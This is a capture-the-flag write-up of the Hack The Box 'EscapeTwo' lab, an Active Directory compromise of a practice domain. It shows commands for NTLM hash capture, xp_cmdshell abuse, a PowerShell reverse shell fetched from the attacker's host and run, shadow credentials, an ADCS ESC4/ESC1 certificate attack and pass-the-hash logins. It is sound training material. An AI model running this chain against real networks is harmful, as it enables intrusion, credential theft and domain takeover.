HTB - EscapeTwo

Enumeration

---

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after:  2055-01-13T19:33:09
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Summary

* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports: 
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $sudo sh -c "echo  '$ip DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $tail -n 1 /etc/hosts
10.10.11.51 DC01 sequel.htb DC01.sequel.htb

Foothold

---

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

With the provided credentials, I will try to connect to services (SMB, MSSQL, LDAP, ..etc)

MSSQL

(impacket) ┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $mssqlclient.py sequel.htb/rose:KxEPkKe6R8su@dc01 -windows-auth

SQL (SEQUEL\rose  guest@master)>

I tried to steal NTLMv2 credentials using xp_dirtree function with SMBServer running on my attacking machine, Then I got the hash but couldn't crack it, So I decided to look for different things.

xp_dirtree \\10.10.16.75\file.txt
sudo impacket-smbserver -smb2support share $(pwd)

I moved then to dump LDAP data and begin to enumerate the domain with bloodhound.py

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous

Also, I tried to get kerberoastable accounts, and I got two of them, but I couldn't crack their hashes, either.

It's worth nothing to Check for ADCS existence as it opens many avenues of we to find any misconfiguration associated with the templates

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nxc ldap 10.10.11.51 -u rose -p 'KxEPkKe6R8su' -M adcs
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.51     389    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 
ADCS        10.10.11.51     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.51     389    DC01             Found PKI Enrollment Server: DC01.sequel.htb
ADCS        10.10.11.51     389    DC01             Found CN: sequel-DC01-CA

I looked for SMB shares using my credentials and found I have access to two shared folders:

InAccounting Department, there is account.xlsx file. First, I tried to open it with Microsoft Excel or any xlsx viewer but it said the file is corrupted.

Since xlsx can be treated as zip file, I unzipped it and began to look for any interesting info.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $ls
accounting_2024.xlsx  accounts.xlsx

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $unzip accounts.xlsx 
Archive:  accounts.xlsx

  inflating: xl/workbook.xml         
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/sharedStrings.xml    
  inflating: _rels/.rels             
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: docProps/custom.xml     
  inflating: [Content_Types].xml  

Inside xl/SharedStrings.xml, there are several credentials

Angela:0fwz7Q4mxxxxxx
0scar:86LxLBMxxxxxxx
kevin:Md9Wlq1xxxxxxxxx
sa:MSSQLP@xxxxxxx

Lateral Movement

---

Using sa account, I can log in to the MSSQL instance as an admin

Impacket version v0.12.0 has built-in commands to automate some attacks, I will use enable_xp_cmdshell

SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL (sa  dbo@master)> xp_cmdshell whoami
output           
--------------   
sequel\sql_svc

I will host PowerShell reverse shell on my web server and download it to the machine

To generate a reverse shell:

python3 /opt/PowerJoker/PowerJoker.py -l 10.10.16.84 -p 1337

Download and Execute the shell

SQL (sa  dbo@master)> xp_cmdshell powershell -c iwr http://10.10.16.84/shell.ps1 -o C:\programdata\rev.ps1
SQL (sa  dbo@master)> xp_cmdshell powershell -c C:\programdata\rev.ps1

Receive Connection

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $rlwrap -cAr nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.84] from (UNKNOWN) [10.10.11.51] 54422

JokerShell C:\Windows\system32>

Under C:\, there is SQL019 folder

JokerShell C:\> ls
    Directory: C:\
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        11/5/2022  12:03 PM                PerfLogs
d-r---         1/4/2025   7:11 AM                Program Files
d-----         6/9/2024   8:37 AM                Program Files (x86)
d-----         6/8/2024   3:07 PM                SQL2019
d-r---         6/9/2024   6:42 AM                Users
d-----         1/4/2025   8:10 AM                Windows

I found sql configuration file, let's see its content

I found the credentials of sql_svc as which I'm running my shell

JokerShell C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI

..snip..
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6Cxxxxxxxxx"

With that password, I will try to spray other users in the system

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6xxxxxxxxxx'

*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
87443ae9f1bdec35xxxxxxxxxxxxxxxx

User Flag: 87443ae9f1bdec35xxxxxxxxxxxxxxxx

Privilege Escalation

---

I will use powerview.py to manually enumerate user's privileges

(powerview.py) ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $python3 /opt/powerview.py/powerview.py sequel.htb/ryan:'WqSZAF6Cyzzzzzzzz'@10.10.11.51

(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Get-DomainUser -Identity ryan -Select ObjectSid
S-1-5-21-548670397-972687484-3496335370-1114

Ryan has WriteOwner on Ca_svc

With these privileges, I will Add Ownership to Ryan, then give him fullcontrol and after that, I can perform Shadow Credentials, Reset Password or targeted Kerberosasting

Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol

Get NT hash of ca_svc using shadow credential attack

With ca_svc hash, I can authenticate to the domain and begin to enumerate ADCS

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable

    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA

..snip..

[!] Vulnerabilities
ESC4     : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

So, there is a template vulnerable to ESC4. That means I have permission to change the attribute associated with that template and make it vulnerable to ESC1

ESC1 is an escalation of misconfigured template is allowed to supply subject alternative name and can be abused to add any user of the domain (Administrator) to the template and get certificate for them.

certipy req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5xxxxxxxxxxxxx7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb

Get administrator hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb

[_] Using principal: administrator@sequel.htb
[_] Trying to get TGT...
[_] Got TGT
[_] Saved credential cache to 'administrator.ccache'
[_] Trying to retrieve NT hash for 'administrator'
[_] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed40xxxxxxxxxxxx

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u administrator -H 7a8d4e04986afa8ed40xxxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
eff768f0b89d396c3xxxxxxxxxxxxxxxxxx

Root Flag: eff768f0b89d396c3xxxxxxxxxxxxxxxxxx